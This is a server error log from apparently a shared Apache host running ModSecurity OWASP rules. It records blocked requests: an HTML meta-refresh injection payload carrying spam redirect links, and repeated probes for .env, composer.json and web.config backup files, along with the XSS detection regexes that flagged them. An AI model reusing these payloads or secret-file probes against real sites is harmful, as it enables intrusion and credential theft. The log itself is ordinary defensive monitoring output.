[Mon May 11 12:25:18.624698 2026] [security2:error] [pid 1254133:tid 1254139] [client 194.233.64.127:62602] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://https%3a%2F%evolv.e.l.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Veloforum.net/proxy.php?link=https://ykm.de/workshop-37763>Kampus Swasta Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=http://Veloforum.net/proxy.php?link=https://ykm.de/workshop-37763 /> found within ARGS:url: http://https%3a%2F%evolv.e.l.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Veloforum.net/proxy.php?link=https://ykm.de/workshop-37763>Kampus Swasta Terbaik Di Indonesia</a><m..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGujhjZymfuKpjWXeiI4gAAAMM"]
[Mon May 11 12:25:18.626483 2026] [security2:error] [pid 1254133:tid 1254139] [client 194.233.64.127:62602] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=http://Veloforum.net/proxy.php?link=https://ykm.de/workshop-37763 /> found within ARGS:url: http://https%3a%2F%evolv.e.l.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Veloforum.net/proxy.php?link=https://ykm.de/workshop-37763>Kampus Swasta Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=http://Veloforum.net/proxy.php?link=https://ykm.de/workshop-37763 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGujhjZymfuKpjWXeiI4gAAAMM"]
[Mon May 11 12:25:18.628049 2026] [security2:error] [pid 1254133:tid 1254139] [client 194.233.64.127:62602] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://https%3a%2F%evolv.e.l.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Veloforum.net/proxy.php?link=https://ykm.de/workshop-37763>Kampus Swasta Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=http://Veloforum.net/proxy.php?link=https://ykm.de/workshop-37763 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTAC [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGujhjZymfuKpjWXeiI4gAAAMM"]
[Mon May 11 12:25:18.629643 2026] [security2:error] [pid 1254133:tid 1254139] [client 194.233.64.127:62602] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://https%3a%2F%evolv.e.l.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Veloforum.net/proxy.php?link=https://ykm.de/workshop-37763>Kampus Swasta Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=http://Veloforum.net/proxy.php?link=https://ykm.de/workshop-37763 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGujhjZymfuKpjWXeiI4gAAAMM"]
[Mon May 11 12:25:18.630319 2026] [security2:error] [pid 1254133:tid 1254139] [client 194.233.64.127:62602] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGujhjZymfuKpjWXeiI4gAAAMM"]
[Mon May 11 12:25:18.631889 2026] [security2:error] [pid 1254133:tid 1254139] [client 194.233.64.127:62602] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGujhjZymfuKpjWXeiI4gAAAMM"]
[Mon May 11 12:25:25.697776 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.177.72.9:62992] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env.development-update"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/v2/.env.development-update"] [unique_id "agGulRjZymfuKpjWXeiI7QAAAMc"]
[Mon May 11 12:25:25.697986 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.177.72.9:62992] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/v2/.env.development-update"] [unique_id "agGulRjZymfuKpjWXeiI7QAAAMc"]
[Mon May 11 12:25:26.859627 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.177.72.9:62992] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGulRjZymfuKpjWXeiI7QAAAMc"]
[Mon May 11 12:25:26.886985 2026] [security2:error] [pid 1254133:tid 1254155] [client 185.177.72.9:63008] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env.development-update"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/v2/.env.development-update"] [unique_id "agGulhjZymfuKpjWXeiI7gAAANM"]
[Mon May 11 12:25:26.887196 2026] [security2:error] [pid 1254133:tid 1254155] [client 185.177.72.9:63008] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/v2/.env.development-update"] [unique_id "agGulhjZymfuKpjWXeiI7gAAANM"]
[Mon May 11 12:25:28.140183 2026] [security2:error] [pid 1254133:tid 1254155] [client 185.177.72.9:63008] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGulhjZymfuKpjWXeiI7gAAANM"]
[Mon May 11 12:25:45.134230 2026] [authz_core:error] [pid 1254179:tid 1254181] [client 195.3.220.7:52592] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-admin/includes/error_log
[Mon May 11 12:25:54.353476 2026] [security2:error] [pid 1254242:tid 1254265] [client 185.177.72.9:45228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env.dist.draft"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/vendor/.env.dist.draft"] [unique_id "agGusr4KNmD_mZ_vlf9FZgAAAFQ"]
[Mon May 11 12:25:54.354139 2026] [security2:error] [pid 1254242:tid 1254265] [client 185.177.72.9:45228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/vendor/.env.dist.draft"] [unique_id "agGusr4KNmD_mZ_vlf9FZgAAAFQ"]
[Mon May 11 12:25:56.482058 2026] [security2:error] [pid 1254242:tid 1254265] [client 185.177.72.9:45228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGusr4KNmD_mZ_vlf9FZgAAAFQ"]
[Mon May 11 12:25:56.506277 2026] [security2:error] [pid 1254133:tid 1254142] [client 185.177.72.9:45240] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env.dist.draft"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/vendor/.env.dist.draft"] [unique_id "agGutBjZymfuKpjWXeiJHQAAAMY"]
[Mon May 11 12:25:56.506850 2026] [security2:error] [pid 1254133:tid 1254142] [client 185.177.72.9:45240] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/vendor/.env.dist.draft"] [unique_id "agGutBjZymfuKpjWXeiJHQAAAMY"]
[Mon May 11 12:25:58.423792 2026] [security2:error] [pid 1254133:tid 1254142] [client 185.177.72.9:45240] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGutBjZymfuKpjWXeiJHQAAAMY"]
[Mon May 11 12:26:09.096367 2026] [security2:error] [pid 1254133:tid 1254136] [client 185.177.72.9:4768] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vercel/.env.test20240101"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/vercel/.env.test20240101"] [unique_id "agGuwRjZymfuKpjWXeiJLAAAAME"]
[Mon May 11 12:26:09.096783 2026] [security2:error] [pid 1254133:tid 1254136] [client 185.177.72.9:4768] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/vercel/.env.test20240101"] [unique_id "agGuwRjZymfuKpjWXeiJLAAAAME"]
[Mon May 11 12:26:10.261222 2026] [security2:error] [pid 1254133:tid 1254136] [client 185.177.72.9:4768] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGuwRjZymfuKpjWXeiJLAAAAME"]
[Mon May 11 12:26:10.288979 2026] [security2:error] [pid 1256241:tid 1256250] [client 185.177.72.9:4782] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vercel/.env.test20240101"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/vercel/.env.test20240101"] [unique_id "agGuwpkIEwRJMyDaV55atQAAAUQ"]
[Mon May 11 12:26:10.289235 2026] [security2:error] [pid 1256241:tid 1256250] [client 185.177.72.9:4782] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/vercel/.env.test20240101"] [unique_id "agGuwpkIEwRJMyDaV55atQAAAUQ"]
[Mon May 11 12:26:11.511642 2026] [security2:error] [pid 1256241:tid 1256250] [client 185.177.72.9:4782] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGuwpkIEwRJMyDaV55atQAAAUQ"]
[Mon May 11 12:26:11.539059 2026] [security2:error] [pid 1254212:tid 1254228] [client 185.177.72.9:4786] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /vercel/composer.json_new"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/vercel/composer.json_new"] [unique_id "agGuw0YQeUtAPynIs6xlTAAAAA4"]
[Mon May 11 12:26:11.539767 2026] [security2:error] [pid 1254212:tid 1254228] [client 185.177.72.9:4786] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/vercel/composer.json_new"] [unique_id "agGuw0YQeUtAPynIs6xlTAAAAA4"]
[Mon May 11 12:26:13.142100 2026] [security2:error] [pid 1254212:tid 1254228] [client 185.177.72.9:4786] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGuw0YQeUtAPynIs6xlTAAAAA4"]
[Mon May 11 12:26:13.163840 2026] [security2:error] [pid 1254328:tid 1254341] [client 185.177.72.9:36394] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /vercel/composer.json_new"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/vercel/composer.json_new"] [unique_id "agGuxURdw2n9wv6Ai48UUAAAAIo"]
[Mon May 11 12:26:13.164170 2026] [security2:error] [pid 1254328:tid 1254341] [client 185.177.72.9:36394] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/vercel/composer.json_new"] [unique_id "agGuxURdw2n9wv6Ai48UUAAAAIo"]
[Mon May 11 12:26:19.556500 2026] [security2:error] [pid 1254328:tid 1254341] [client 185.177.72.9:36394] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGuxURdw2n9wv6Ai48UUAAAAIo"]
[Mon May 11 12:26:26.097172 2026] [security2:error] [pid 1254328:tid 1254339] [client 185.177.72.9:7840] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /videos/web.config-old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/videos/web.config-old"] [unique_id "agGu0kRdw2n9wv6Ai48UagAAAIg"]
[Mon May 11 12:26:26.097463 2026] [security2:error] [pid 1254328:tid 1254339] [client 185.177.72.9:7840] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/videos/web.config-old"] [unique_id "agGu0kRdw2n9wv6Ai48UagAAAIg"]
[Mon May 11 12:26:27.328637 2026] [security2:error] [pid 1254328:tid 1254339] [client 185.177.72.9:7840] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGu0kRdw2n9wv6Ai48UagAAAIg"]
[Mon May 11 12:26:27.333239 2026] [security2:error] [pid 1254179:tid 1254185] [client 185.177.72.9:7854] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /videos/web.config-old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/videos/web.config-old"] [unique_id "agGu02S6k_SCYd1AVZq68gAAAQQ"]
[Mon May 11 12:26:27.333617 2026] [security2:error] [pid 1254179:tid 1254185] [client 185.177.72.9:7854] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/videos/web.config-old"] [unique_id "agGu02S6k_SCYd1AVZq68gAAAQQ"]
